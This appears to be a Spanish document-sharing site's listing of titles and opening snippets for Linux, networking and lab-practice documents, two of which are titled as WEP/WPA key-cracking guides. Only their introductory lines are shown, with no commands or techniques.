Instrucciones de instalación de IBM SPSS Modeler Server 17 para UNIX Instrucciones de instalación de IBM SPSS Modeler Server 17 para UNIX Contenido Instrucciones para la instalación.... 1 Requisitos del sistema........... 1 Requisitos adicionales.......... 1 Instalación...............

Más detalles

GESTIÓN DE ARCHIVOS GNU/LINUX vs WINDOWS

GESTIÓN DE ARCHIVOS GNU/LINUX vs WINDOWS GESTIÓN DE ARCHIVOS GNU/LINUX vs WINDOWS Una de las primeras dificultades con las que se encuentran los usuarios novatos de Linux (por su gran diferencia con los sistemas operativos Windows) es la navegación

Más detalles

Práctica 3 Observando la red

Práctica 3 Observando la red Práctica 3 Observando la red 1. Objetivos El objetivo principal que se persigue en esta práctica es ser capaz de observar el tráfico de red mediante un analizador de protocolos como Wireshark y comprender

Más detalles

Configuración básica de la red

Configuración básica de la red Configuración básica de la red Departamento de Sistemas Telemáticos y Computación (GSyC) http://gsyc.urjc.es Febrero de 2012 GSyC - 2012 Configuración básica de la red 1 c 2012 GSyC Algunos derechos reservados.

Más detalles

LPIC-1 Guía de estudio Exámenes 101-102

LPIC-1 Guía de estudio Exámenes 101-102 LPIC-1 Guía de estudio Exámenes 101-102 Agradecimientos Sobre el autor Introducción Qué es Linux? Por qué obtener una certificación Linux? Cómo obtener un certificado del LPI Por qué debería comprar este

Más detalles

INSTALACION VIRTUALIZADA DE UBUNTU SERVER CON SERVICIOS LAMP Y OPENSSH SOBRE VIRTUAL BOX. Nicolás Botero Botero Juan Manuel Velásquez Isaza

INSTALACION VIRTUALIZADA DE UBUNTU SERVER CON SERVICIOS LAMP Y OPENSSH SOBRE VIRTUAL BOX. Nicolás Botero Botero Juan Manuel Velásquez Isaza INSTALACION VIRTUALIZADA DE UBUNTU SERVER CON SERVICIOS LAMP Y OPENSSH SOBRE VIRTUAL BOX Nicolás Botero Botero Juan Manuel Velásquez Isaza Universidad Tecnológica de Pereira Facultad de Ingenierías Ingeniería

Más detalles

WEP, WPA/WPA2 Cracking

WEP, WPA/WPA2 Cracking WEP, WPA/WPA2 Cracking By: Alfa-Omega Introduccion En este manual explicare como crackear claves wep, wpa y wpa2, para ello utilizare el live cd de backtrack 3 (beta) y la suite aircrack (la suite aircrack

Más detalles

UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN

UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN UNIVERSIDAD DON BOSCO FACULTAD DE ESTUDIOS TECNOLÓGICOS ESCUELA DE COMPUTACIÓN CICLO: 02/2015 GUÍA DE LABORATORIO #6 Nombre de la Practica: Instalación de FreeBSD para Server. Tiempo Estimado: 2 horas

Más detalles

! " # $!% & % '" ()!*++,

!  # $!% & % ' ()!*++, !" # $!%&%'" ()!*++, Qué es Linux? Antecedentes. Licencia. Características. Entorno de Trabajo. Estructura General. Sistema de Ficheros. Tipos. Path. Permisos de Acceso. Distribuciones Comerciales. Elementos

Más detalles

Laboratorio de Redes de Computadores

Laboratorio de Redes de Computadores 3. Análisis de tráfico en una LAN 3.1 Introducción En esta práctica se va a trabajar sobre la misma configuración de red utilizada en la práctica anterior (Figura 32) y se van a hacer ejercicios muy similares,

Más detalles

UNIDAD DIDACTICA 11 CONFIGURACIÓN DE LA RED EN GNU/LINUX

UNIDAD DIDACTICA 11 CONFIGURACIÓN DE LA RED EN GNU/LINUX UNIDAD DIDACTICA 11 CONFIGURACIÓN DE LA RED EN GNU/LINUX Eduard Lara 1 1. INTRODUCCIÓN En este capítulo recorreremos los pasos necesarios para configurar el protocolo TCP/IP en una máquina: Asignación

Más detalles

LABORATORIO DE FTP. PRESENTADO POR: Diana Maritza Aragón Marta Moreno Luis Miguel Pérez. PRESENTADO A: Marcelo Utard Javier Bozzuto

LABORATORIO DE FTP. PRESENTADO POR: Diana Maritza Aragón Marta Moreno Luis Miguel Pérez. PRESENTADO A: Marcelo Utard Javier Bozzuto LABORATORIO DE FTP PRESENTADO POR: Diana Maritza Aragón Marta Moreno Luis Miguel Pérez PRESENTADO A: Marcelo Utard Javier Bozzuto ESCUELA DE GRADUADOS DE ELECTRÓNICA Y TELECOMUNICACIONES LABORATORIO DE

Más detalles

MÒDUL 1: Instal lació, administració, gestió i implementació del servidor web i la seva seguretat. Instalación de servidores FTP y WEB en Linux

MÒDUL 1: Instal lació, administració, gestió i implementació del servidor web i la seva seguretat. Instalación de servidores FTP y WEB en Linux MÒDUL 1: Instal lació, administració, gestió i implementació del servidor web i la seva seguretat Instalación de servidores FTP y WEB en Linux ÍNDICE 1. Instalación de Linux Ubuntu en el Vmware 2. Comandos

Más detalles

Tema 1: Introducción al S.O.

Tema 1: Introducción al S.O. Tema 1: Introducción al S.O. Enrique Soriano Laboratorio de Sistemas, Grupo de Sistemas y Comunicaciones, URJC 18 de enero de 2012 (cc) 2008 Grupo de Sistemas y Comunicaciones. Algunos derechos reservados.

Más detalles

T4.- El sistema operativo Linux.

T4.- El sistema operativo Linux. TECNOLOGÍAS DE LA INFORMACIÓN Y LA COMUNICACIÓN. TEMA 4 SISTEMA OPERATIVO LINUX. Tux, mascota oficial de Linux. 1.- Distribuciones de Linux Linux es un sistema operativo libre, es decir, puedes utilizarlo,

Más detalles

Comandos Linux Ayuda. Archivos y directorios

Comandos Linux Ayuda. Archivos y directorios Comandos Linux Ayuda man muestra manual del comando que le indiquemos --help da una ayuda de los comandos Archivos y directorios ls lista los archivos y directorios sort ordena alfabéticamente una lista

Más detalles

Auditoria Wireless. Cracking WEP & WPA keys. Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx. Linux/Aircrack

Auditoria Wireless. Cracking WEP & WPA keys. Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx. Linux/Aircrack Auditoria Wireless Cracking WEP & WPA keys Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx Linux/Aircrack Contenido Introducción WEP WPA Practicas Part 1 Razones por las cuales tomé el

Más detalles

4.- ESTRUCTURA DEL SISTEMA DE ARCHIVOS DE LINUX

4.- ESTRUCTURA DEL SISTEMA DE ARCHIVOS DE LINUX 4.- ESTRUCTURA DEL SISTEMA DE ARCHIVOS DE LINUX 4.1.- Tipos de archivos La base del sistema de archivos de Linux, es obviamente el archivo, que no es otra cosa que la estructura empleada por el sistema

Más detalles

Autor: Prof. Pedro A. Hernández correo: pedroadonis@gmail.com Versión 1.0

Autor: Prof. Pedro A. Hernández correo: pedroadonis@gmail.com Versión 1.0 Tema: Unidad 3. Los comandos que se presenta en esta práctica son para el manejo de los archivos del Sistema Operativo GNU/Linux. Tiempo estimado de Ejecución : 1.30 H Valoración: 10% Objetivo: Dar a conocer

Más detalles

2. Bajando e instalando k3b.

2. Bajando e instalando k3b. Instalación y uso de k3b. 1. Introducción El K3B es un paquete que nos permitirá crear o duplicar nuestros CD - DVD tanto de datos como musicales. Es de sencillo manejo y satisfará todas nuestras exigencias.

Más detalles

El Sistema Operativo Linux INTRODUCCIÓN A LAS TECNOLOGÍAS INFORMÁTICAS

El Sistema Operativo Linux INTRODUCCIÓN A LAS TECNOLOGÍAS INFORMÁTICAS El Sistema Operativo Linux INTRODUCCIÓN A LAS TECNOLOGÍAS INFORMÁTICAS Contenido 1. Linux: Un poco de Historia 2. Características 3. Elementos de la Interfaz gráfica 4. Línea de Comandos 5. Comandos básicos

Más detalles

Análisis de comunicaciones TCP/IP con Ethereal

Análisis de comunicaciones TCP/IP con Ethereal Taller Federico Lazcano flazcano@eie.fceia.unr.edu.ar Área Comunicaciones Escuela de Ingeniería Electrónica Facultad de Ciencias Exactas, Ingeniería y Agrimensura Universidad Nacional de Rosario Página

Más detalles

Redes. Herramientas de red en GNU/Linux. Desactivar / activar bluetooth. rfkill block bluetooth. rfkill unblock bluetooth. Todas las interfaces de red

Redes. Herramientas de red en GNU/Linux. Desactivar / activar bluetooth. rfkill block bluetooth. rfkill unblock bluetooth. Todas las interfaces de red 2016/01/27 19:48 1/6 Redes Redes Herramientas de red en GNU/Linux Desactivar / activar bluetooth rfkill block bluetooth rfkill unblock bluetooth Todas las interfaces de red ifconfig ifconfig wlan0 wlan0:

Más detalles

Laboratorio de Router Estático Laboratorio de Redes 2

Laboratorio de Router Estático Laboratorio de Redes 2 Laboratorio de Router Estático Laboratorio de Redes 2 Profesor: Diego Aracena Pizarro PARTE I Armar una red doméstica (PC Router con Ubuntu o Linux) La figura 1 muestra la topología de red ha utilizar

Más detalles

Gestión de discos duros en Linux

Gestión de discos duros en Linux Este documento está bajo licencia Creative Commons Trabajo realizado por: José Ignacio Mardomingo Chacón Gestión de discos duros en Linux 1.-Inserta un nuevo disco y crea dos particiones con distinto tipo

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor FTP Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor FTP FTP (File

Más detalles

Fig.1 Redes conectadas a Internet a través de routers IP

Fig.1 Redes conectadas a Internet a través de routers IP PRACTICA 4 EL PROTOCOLO IP Hasta ahora hemos visto aspectos relacionados con el hardware de red de nuestras máquinas: Acceso al adaptador de red y un mecanismo para la resolución de direcciones hardware.

Más detalles

Práctica 5: Listas de acceso estándar y extendidas

Práctica 5: Listas de acceso estándar y extendidas Práctica 5: Listas de acceso estándar y extendidas Material necesario: - maqueta de routers, cables de red y consola y ordenadores de consola. Introducción: Las listas de acceso (ACLs Access Lists) son

Más detalles

Linux Guía básica Ordenes de Linux

Linux Guía básica Ordenes de Linux Linux Guía básica Ordenes de Linux ls Lista los ficheros de un directorio concreto ls -l Lista también las propiedades y atributos ls -la Lista ficheros incluidos los ocultos de sistema cd nom_directorio

Más detalles

Esta es la interfaz gráfica de Ubuntu (Linux) Manejo. Ésto es un poco el manejo básico para saber manejar archivos y directorios.

Esta es la interfaz gráfica de Ubuntu (Linux) Manejo. Ésto es un poco el manejo básico para saber manejar archivos y directorios. Esta es la interfaz gráfica de Ubuntu (Linux) Manejo Ésto es un poco el manejo básico para saber manejar archivos y directorios. ls [opciones] [archivos]; (list) Lista el contenido de un directorio, mostrando

Más detalles

Introducción a las redes TCP/IP en Linux

Introducción a las redes TCP/IP en Linux Diseño y Administración de Sistemas y Redes Juan Céspedes Curso 2005 2006 Subsistema de red 1 Subsistema de red Los subsistemas más importantes del kernel de Linux son: gestión

Más detalles

Guía de instalación de Debian GNU/Linux para principiantes.

Guía de instalación de Debian GNU/Linux para principiantes. Guía de instalación de Debian GNU/Linux para principiantes. Introducción. La presente guía indica el paso a paso para instalar la version 4.0 de Debian GNU/Linux (nombre código Etch) en un equipo con el

Más detalles

Práctica 1: Herramientas básicas:

Práctica 1: Herramientas básicas: Práctica 1: Herramientas básicas: En esta práctica veremos las siguientes herramientas: Conexión a Terminal remoto Conexión a escritorio remoto Otras herramientas Duración: 1 sesión de 2 5 horas Conexión

Más detalles

Solución del examen de Redes - Segundo parcial - ETSIA - 1 de junio 2007

Solución del examen de Redes - Segundo parcial - ETSIA - 1 de junio 2007 Solución del examen de Redes - Segundo parcial - ETSIA - de junio 2007 Apellidos, Nombre: Grupo de matrícula:. (0,75 puntos) La captura mostrada en la figura siguiente se ha realizado desde un equipo del

Más detalles

MÁSTER ONLINE EN ADMINISTRACIÓN LINUX

MÁSTER ONLINE EN ADMINISTRACIÓN LINUX MÁSTER ONLINE EN ADMINISTRACIÓN LINUX Módulo 1 Hardware & Arquitectura de sistemas - 20 horas Este módulo permite conocer y configurar los elementos básicos del hardware del sistema, como también otros

Más detalles

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé. Sistema Operativo 3 PRACTICA NO.

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé. Sistema Operativo 3 PRACTICA NO. PRACTICA NO. 10, SERVIDOR WEB CREAR UN HOWTO SOBRE EL SERVIDOR WEB APACHE - CREAR UNA PAGINA WEB QUE FUNCIONE SOBRE ESE SERVIDOR - PUBLICAR UN DIRECTORIO DE DATOS QUE ME PERMITA BAJAR - ARCHIVOS DESDE

Más detalles

Uso básico de la terminal

Uso básico de la terminal Uso básico de la terminal Comandos básicos El CLI más utilizado en Linux se llama GNU/Bash (o solo Bash --Bourne Again Shell) algunas variables y comandos que son de utilidad son:. ruta actual ~ home del

Más detalles

REDES DE COMPUTADORES REDES Y SISTEMAS DISTRIBUIDOS

REDES DE COMPUTADORES REDES Y SISTEMAS DISTRIBUIDOS REDES DE COMPUTADORES REDES Y SISTEMAS DISTRIBUIDOS Título de la práctica Sesión Monitorización de redes con Ethereal Semana 15/01/2007 Laboratorio 2.2 Material utilizado PCs, PC-Router, Routers Linksys

Más detalles

Laboratorio 1 Preparación del entorno de laboratorio

Laboratorio 1 Preparación del entorno de laboratorio DEPARTAMENTO DE TECNOLOGÍA ELECTRÓNICA ESCUELA TÉCNICA SUPERIOR DE INGENIERÍA INFORMÁTICA Laboratorio 1 Preparación del entorno de laboratorio Enunciados de Prácticas de Laboratorio Tecnologías Avanzadas

Más detalles

UNIDAD DIDACTICA 1 INTRODUCCIÓN A LAS REDES CON LINUX SERVER

UNIDAD DIDACTICA 1 INTRODUCCIÓN A LAS REDES CON LINUX SERVER UNIDAD DIDACTICA 1 INTRODUCCIÓN A LAS REDES CON LINUX SERVER Eduard Lara 1 1. INTRODUCCIÓN S.O. EN RED Un S.O. en red realiza una gestión centralizada del software y de los recursos hardware de la red.

Más detalles

Administración de usuarios y grupos en Debian {Terminal}

Administración de usuarios y grupos en Debian {Terminal} Rocío Alt. Abreu Ortiz 2009-3393 Administración de usuarios y grupos en Debian {Terminal} Linux es un sistema multiusuario y permite que varios usuarios puedan acceder, incluso simultáneamente. Cada usuario

Más detalles

66.69 CRIPTOGRAFÍA Y SEGURIDAD INFORMÁTICA

66.69 CRIPTOGRAFÍA Y SEGURIDAD INFORMÁTICA Departamento de Electrónica Facultad de Ingeniería. Universidad de Buenos Aires. Seguridad en UNIX Temas Introducción System V vs Berkeley Kernel y Shells Como obtener Ayuda File System Administración

Más detalles

Guía Comandos Básicos sobre Unix/Linux

Guía Comandos Básicos sobre Unix/Linux Guía Comandos Básicos sobre Unix/Linux 1 Manupilación básica de archivos Comando Descripción Ejemplo pwd Mostrar el directorio en el cual estoy actualmente/trabajando pwd ls Mostrar el contenido de un

Más detalles

LA ARQUITECTURA TCP/IP

LA ARQUITECTURA TCP/IP LA ARQUITECTURA TCP/IP Hemos visto ya como el Modelo de Referencia de Interconexión de Sistemas Abiertos, OSI-RM (Open System Interconection- Reference Model) proporcionó a los fabricantes un conjunto

Más detalles

Curso Taller de Química Computacional Módulo II. PRACTICO 1 Introducción al uso del sistema operativo Linux.

Curso Taller de Química Computacional Módulo II. PRACTICO 1 Introducción al uso del sistema operativo Linux. Curso Taller de Química Computacional Módulo II PRACTICO 1 Introducción al uso del sistema operativo Linux. Objetivos : Aprender a conectarse con la maquina desde una terminal remota e iniciar una sesión.

Más detalles

UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA

UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA Eduard Lara 1 1. INICIO SESIÓN EN LINUX Inicio en modo local Se enciende el equipo y se introduce el nombre de usuario local y su contraseña,

Más detalles

servidor escuela Introducción Hardware servidor escuela Adicionalmente, se han realizado configuraciones para poder agregar otros recursos:

servidor escuela Introducción Hardware servidor escuela Adicionalmente, se han realizado configuraciones para poder agregar otros recursos: Adicionalmente, se han realizado configuraciones para poder agregar otros recursos: Introducción servidor escuela El sistema para servidores está basado en Fedora 14, un sistema estable y con un entorno

Más detalles

Práctica de laboratorio 4.5.2: Protocolos de la capa de Transporte TCP/IP, TCP y UDP Diagrama de topología

Práctica de laboratorio 4.5.2: Protocolos de la capa de Transporte TCP/IP, TCP y UDP Diagrama de topología Práctica de laboratorio 4.5.2: Protocolos de la capa de Transporte TCP/IP, TCP y UDP Diagrama de topología Este documento es información pública de Cisco. Página 1 de 10 Tabla de direccionamiento Dispositivo

Más detalles

Administración de servicios Internet Intranet

Administración de servicios Internet Intranet Administración de servicios Internet Intranet Tema 1: TCP/IP E.U.I.T. Informática Gijón Curso 2003/2004 ASII 1 Descripción general Internet y TCP/IP Arquitectura. Direcciones IP Subredes Configuración

Más detalles

Lo esencial del archivo Fstab

Lo esencial del archivo Fstab A) Que es el archivo Fstab? Fstab significa: File System Table (Tabla de Sistemas de ficheros). Se encuentra en el directorio /etc/fstab. Cuando encendemos nuestro PC con Linux, el sistema operativo se

Más detalles

UNIVERSIDAD DE CANTABRIA DEPARTAMENTO DE INGENIERÍA DE COMUNICACIONES GRUPO DE INGENIERÍA TELEMÁTICA

UNIVERSIDAD DE CANTABRIA DEPARTAMENTO DE INGENIERÍA DE COMUNICACIONES GRUPO DE INGENIERÍA TELEMÁTICA UNIVERSIDAD DE CANTABRIA DEPARTAMENTO DE INGENIERÍA DE COMUNICACIONES GRUPO DE INGENIERÍA TELEMÁTICA PROTOCOLOS PARA LA INTERCONEXIÓN DE REDES PRÁCTICA 1 CONFIGURACIÓN Y ANÁLISIS DE REDES TCP/IP Práctica

Más detalles

TALLER DE TECNOLOGÍAS PARA LA EDUCACIÓN: PerúEduca Guía de Instalación y Configuración para Servidores

TALLER DE TECNOLOGÍAS PARA LA EDUCACIÓN: PerúEduca Guía de Instalación y Configuración para Servidores TALLER DE TECNOLOGÍAS PARA LA EDUCACIÓN: PerúEduca Guía de Instalación y Configuración para Servidores 1 GUÍA DE INSTALACIÓN Y CONFIGURACIÓN PARA SERVIDORES 1. INTRODUCCIÓN El sistema para servidores

Más detalles

TUTORIAL: Como Instalar Ubuntu 10.10 sin formatear Windows. Por aolinex.

TUTORIAL: Como Instalar Ubuntu 10.10 sin formatear Windows. Por aolinex. TUTORIAL: Como Instalar Ubuntu 10.10 sin formatear Windows Por aolinex. INTRODUCCIÓN El objetivo de éste tutorial es dar a conocer que dar el primer paso en el mundo de GNU/Linux no es difícil como lo

Más detalles

CURSO PRÁCTICO DE REDES PRÁCTICA 3a PRÁCTICA DE TCP-IP ARP/ICMP/IP. Departamento de Ingeniería Área de Ingeniería de Sistemas y Automática 1.

CURSO PRÁCTICO DE REDES PRÁCTICA 3a PRÁCTICA DE TCP-IP ARP/ICMP/IP. Departamento de Ingeniería Área de Ingeniería de Sistemas y Automática 1. 1. OBJETIVO Estas prácticas se proponen como una herramienta fundamental para asimilar los conceptos de sistemas distribuidos, centrándose en el estudio de los protocolos de comunicaciones de la familia

Más detalles

EJERCICIO 2: Control de acceso al GRUB en modo claro

EJERCICIO 2: Control de acceso al GRUB en modo claro PRÁCTICA 7: HERRAMIENTAS DE SEGURIDAD ACTIVA EN EL SISTEMA OBJETIVO: En este tema se han tratado una serie de mecanismos y herramientas que se utilizan en diferentes sistemas operativos para lograr una

Más detalles

7º Unidad Didáctica. Protocolos TELNET y SSH. Eduard Lara

7º Unidad Didáctica. Protocolos TELNET y SSH. Eduard Lara 7º Unidad Didáctica Protocolos TELNET y SSH Eduard Lara 1 1. SERVIDOR TELNET Telnet viene de TELecommunication NETwork. Es el nombre de un protocolo de red y del programa informático que implementa el

Más detalles

ESCUELA TÉCNICA SUPERIOR DE INGENIEROS INDUSTRIALES Y DE TELECOMUNICACIÓN

ESCUELA TÉCNICA SUPERIOR DE INGENIEROS INDUSTRIALES Y DE TELECOMUNICACIÓN ESCUELA TÉCNICA SUPERIOR DE INGENIEROS INDUSTRIALES Y DE TELECOMUNICACIÓN Titulación: INGENIERO TÉCNICO EN INFORMÁTICA DE GESTIÓN Título del proyecto: TÍTULO DEL PROYECTO FIN DE CARRERA Fco. Javier Luquin

Más detalles

UNIDAD DIDACTICA 14 REQUISITOS PREVIOS PARA CONFIGURAR LINUX UBUNTU SERVER COMO CONTROLADOR DE DOMINIO

UNIDAD DIDACTICA 14 REQUISITOS PREVIOS PARA CONFIGURAR LINUX UBUNTU SERVER COMO CONTROLADOR DE DOMINIO UNIDAD DIDACTICA 14 REQUISITOS PREVIOS PARA CONFIGURAR LINUX UBUNTU SERVER COMO CONTROLADOR DE DOMINIO Eduard Lara 1 1. COMPROBACIONES PREVIAS ANTES DE INSTALAR EL CONTROLADOR Antes de hacer que Linux

Más detalles